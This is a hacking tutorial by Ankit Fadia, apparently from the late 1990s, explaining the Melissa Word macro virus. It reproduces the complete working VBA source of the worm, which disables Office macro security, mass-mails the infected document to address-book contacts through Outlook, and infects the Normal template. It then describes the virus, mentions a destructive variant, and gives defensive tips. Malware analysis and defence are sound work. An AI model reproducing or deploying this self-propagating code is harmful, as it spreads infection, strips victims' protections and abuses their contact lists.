______________________________________________________________________________ Melissa and other Macro Viruses Explained----By Ankit Fadia ______________________________________________________________________________ http://blacksun.box.sk Melissa, the deadliest Macro Virus ever to hit the net is dreaded by people all over the world. I am going to shed some light on how it works and how to protect yourself from Macro Viruses and lots more. Well let me start by giving a brief History about Melissa's origin. Well it is believed that Melissa originated first in Western Europe on the alt.sex newsgroup. It had taken the web by storm and is somewhat quite deadly. So How does it Work? Melissa is a Word Macro Virus. That is, it was written in the Visual Basic Editor which comes alongwith Office97 or Office2K *************** NewBie Note: Run Word or Excel and press Alt + F11 to launch the Visual Basic Editor. *************** The core of Microsoft's Office suite is a Visual Basic Engine which runs behind the scenes and can be used for advanced Visual Basic coding. So the following code was written in this Visual Basic editor. /--------The Melissa Word Macro Virus Code: Start--------\ Private Sub Document_Open() On Error Resume Next If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& Else CommandBars("Tools").Controls("Macro").Enabled = False Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1) End If Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice Set UngaDasOutlook = CreateObject("Outlook.Application") Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI") If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then If UngaDasOutlook = "Outlook" Then DasMapiName.Logon "profile", "password" For y = 1 To DasMapiName.AddressLists.Count Set AddyBook = DasMapiName.AddressLists(y) x = 1 Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.Add Peep x = x + 1 If x > 50 Then oo = AddyBook.AddressEntries.Count Next oo BreakUmOffASlice.Subject = "Important Message From " & Application.UserName BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)" BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send Peep = "" Next y DasMapiName.Logoff End If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo" End If Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1) Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1) NTCL = NTI1.CodeModule.CountOfLines ADCL = ADI1.CodeModule.CountOfLines BGN = 2 If ADI1.Name <> "Melissa" Then If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL Set ToInfect = ADI1 ADI1.Name = "Melissa" DoAD = True End If If NTI1.Name <> "Melissa" Then If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL Set ToInfect = NTI1 NTI1.Name = "Melissa" DoNT = True End If If DoNT <> True And DoAD <> True Then GoTo CYA If DoNT = True Then Do While ADI1.CodeModule.Lines(1, 1) = "" ADI1.CodeModule.DeleteLines 1 Loop ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()") Do While ADI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop End If If DoAD = True Then Do While NTI1.CodeModule.Lines(1, 1) = "" NTI1.CodeModule.DeleteLines 1 Loop ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()") Do While NTI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop End If CYA: If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then ActiveDocument.Saved = True End If 'WORD/Melissa written by Kwyjibo 'Works in both Word 2000 and Word 97 'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide! 'Word -> Email | Word 97 <--> Word 2000 ... it's a new age! If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here." End Sub \--------The Melissa Word Macro Virus Code: End--------/ Melissa infects Word97 and Word2000 documents. If you receive an email with a document attached which is infected with the Melissa Word Macro then your computer is not infected by just reading the email, Melissa is on your machine ony if you open the infected attached Word Document. Once Melissa is on your machine, the macro virus will attempt to start MicroSoft Outlook to send copies of the infected document to 50 people in Outlook's Address Book as an attachment. The message sent by this Macro Virus to 50 people from the address book as as follows: The email Subject reads: Important Message From [username] Here the Username is the Name that you have set as your Nickname or the name which Outlook puts to all Outgoing mail. The Email Body reads: Here is the document you asked for….don't show anyone else. ;-) And this email has the infected document as an attachment. The infected document reportedly contains some passwords to X rated sites. The Virus is restricted to MS Outlook and MS Exchange and does not trigger such mass mailings on other Mail Platforms like Lotus Notes. What's worse is that the Virus turns off Office's Macro Protection leaving the user exposed to future Viruses. It also makes the Tools > Macro command inaccessable, preventing you from checking any Macro that may be present in a Document or a Template. It also switches off som eof Office97 and Office2K's advanced features like Macro Virus Protection, the prompt to SAVE NORMAL template, and the Confirm Conversion at Open. With these options disabled, MS Word 97 does not warn or prompt while saving the NORMAL.DOT or while opening a document with macros in it. When a user opens or closes an infected document, the virus first checks to see if it has done this mass e-mailing once before, by checking the following registry key: "HKEY_CURRENT_USER\Software\Microsoft\Office\" as "Melissa?" value. If this key has a value "Melissa?" set to the value "...by Kwyjibo", then the mass e-mailing has been done previously from the current machine. The virus will not attempt to do the mass mailing a second time, if it has already been done from this machine.If the Virus does not find the registry key it will carry out the Mass Mailings. The Macro Virus will send out mass mailings only once from an infected machine, but it's effects do not end here, it has a secondry consequence which triggers once every hour. Let me make it more clear, When the time of the day matches the date(for example: at 2.21 pm on May 21st the Virus is triggered.) the Virus pops the following phrase on the screen: Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here. Say a particular document is opened or saved at this particular time then the above text is inserted in the Document. Although this aspect of the Melissa Virus is harmless, it might be used in the future by some malicious Virus coder to write a deadlier Variant of the Melissa. If the Virus attacks via Word2000 it will modify the Registry setting such the security level is set to the minimum and the Macro Security Feature is turned off. W97M.Melissa.IJ Have you ever got an email with the subject 'Pictures' and the line 'What's Up' in the body of the message and a word document as an attachment, then it is likely that your computer is infected by the W97M.Melissa.IJ (Geni) Macro Virus. The virus tries to use Microsoft Outlook to email a copy of the infected document to upto 4 random addresses from the address book. It can also delete system files like io.sys and command.com making it impossible to boot up your machine. Just for your info, the person who coded this virus was traced by the authorites with the help of AOL within a week of it's first appearance. Later he was bailed out for $100,000. How do I protect myself from these Macro Viruses? Well If you are already infected then the best thing to do would be to update your Antiviral Software. IF you are not already infected then there are many ways to protect yourself from further protection. 1. Change the attributes of the File Normal.dot to read only. But this foolproof method does not allow you to make modifications to this file if you want to. 2. The Other thing you could do is Password Protect the Normal.dot file, this will ask you for a password evry time you want to modify normal.dot thus allowing to make changes to this file whenever you want to. 3. Well there is yet another way out. Now almost all Word97 Macro Viruses are Visual Basic Applications or VBA code you can protect yourself from them by locking then out. Just start the Visual Basic Editor by Pressing ALT+ F11 and select Normal in the Project Explorer. Now select Normal Properties from the Tools menu. Next choose Protection tab in the Project Properties dialog box and enter a password to view project properties option. This locks out the Macro viruses but allows you to modify the Normal.dot file. Well that's all for now, I will soon be updating this file, so keep checking. Ankit Fadia To receive more tutorials on Hacking and Viruses join my mailing list by sending an email to: Programmingforhackers-subscribe@egroups.com